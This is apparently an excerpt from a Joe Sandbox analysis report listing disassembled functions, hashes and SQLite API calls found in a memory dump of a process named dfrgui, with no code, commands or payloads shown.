                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmp
                                                                                              • String ID: sqlite_master$sqlite_temp_master
                                                                                              • API String ID: 912767213-3047539776
                                                                                              • Opcode ID: 12fcf227dbcda8661fcd8af2cb0b3f0866165027c89607d1779178c6e6561a52
                                                                                              • Instruction ID: b9c502ee173f1856507a055c09ea6eab5597e238da70938a4843ed6337d6f2b4
                                                                                              • Opcode Fuzzy Hash: 12fcf227dbcda8661fcd8af2cb0b3f0866165027c89607d1779178c6e6561a52
                                                                                              • Instruction Fuzzy Hash: B91152B1A002158FAB04DFEAD8C0E5BB7F4FF84719B258969DC25DB301D770D92186B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1D9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D9D5
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                              • String ID:
                                                                                              • API String ID: 3265351223-3916222277
                                                                                              • Opcode ID: b7e183696c6f76990d91f64a296b4fe1275532d5e4e8e5745fbf77ae69801f39
                                                                                              • Instruction ID: 0b561e68026e55031ffe968a23126f12ad37f70900dbae251c42323ab107e6b3
                                                                                              • Opcode Fuzzy Hash: b7e183696c6f76990d91f64a296b4fe1275532d5e4e8e5745fbf77ae69801f39
                                                                                              • Instruction Fuzzy Hash: 84118B3590C2859BEB05DFE9C0CA25A7BF0FF49308F608498D9C48B34ADB31C960C792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1D94A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1D963
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E1D96F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                              • String ID:
                                                                                              • API String ID: 3265351223-3916222277
                                                                                              • Opcode ID: 9ed41e6173973cf26dca8f28c8b1bd458f8d4f3a0adab18fb41b577895b33514
                                                                                              • Instruction ID: dc2ddb9f96d0a3c358018c613854b4c6d117ddefba8615c23316a190631becf2
                                                                                              • Opcode Fuzzy Hash: 9ed41e6173973cf26dca8f28c8b1bd458f8d4f3a0adab18fb41b577895b33514
                                                                                              • Instruction Fuzzy Hash: E5019E349087059BDB049FB8C4C965A7BF5FF45324F25C55DD8E48B28DD771D8508B82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E10346 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E103B5), ref: 61E1035E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter
                                                                                              • String ID: @Da$@Da
                                                                                              • API String ID: 3053899952-1574951822
                                                                                              • Opcode ID: 21ba869d0d807d901ad9e4d81d65ed77a5909eecc4d62f618926f0a481b5edce
                                                                                              • Instruction ID: 628a6049420a8f2f5a7e7b0193214567f9be39e30e648a7468be74f3e843a349
                                                                                              • Opcode Fuzzy Hash: 21ba869d0d807d901ad9e4d81d65ed77a5909eecc4d62f618926f0a481b5edce
                                                                                              • Instruction Fuzzy Hash: 36F0E23070C2044BEB109EBD84D272BBBD6E788358F68C97AE589CF398D720D8608381
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E38ACB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E38AD2
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_str_vappendf.SQLITE3 ref: 61E38B1D
                                                                                                • Part of subcall function 61E215AC: sqlite3_str_append.SQLITE3 ref: 61E21628
                                                                                                • Part of subcall function 61E215AC: sqlite3_str_append.SQLITE3 ref: 61E2165C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_append$sqlite3_configsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_str_vappendf
                                                                                              • String ID: F
                                                                                              • API String ID: 4014417345-1304234792
                                                                                              • Opcode ID: f1a384071fd9cb2195bf3db03fd96d7dd68d5d8888f9c411968fc47c13b791e9
                                                                                              • Instruction ID: e59b3cd03e394578f332547a81ea582b1f3621bb50ad6d78f1bcec5508e81ac3
                                                                                              • Opcode Fuzzy Hash: f1a384071fd9cb2195bf3db03fd96d7dd68d5d8888f9c411968fc47c13b791e9
                                                                                              • Instruction Fuzzy Hash: D9F0E2B0D0438A8BDB00DFA8C98478EBBF4AB85358F248429D8499F344E776D648CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%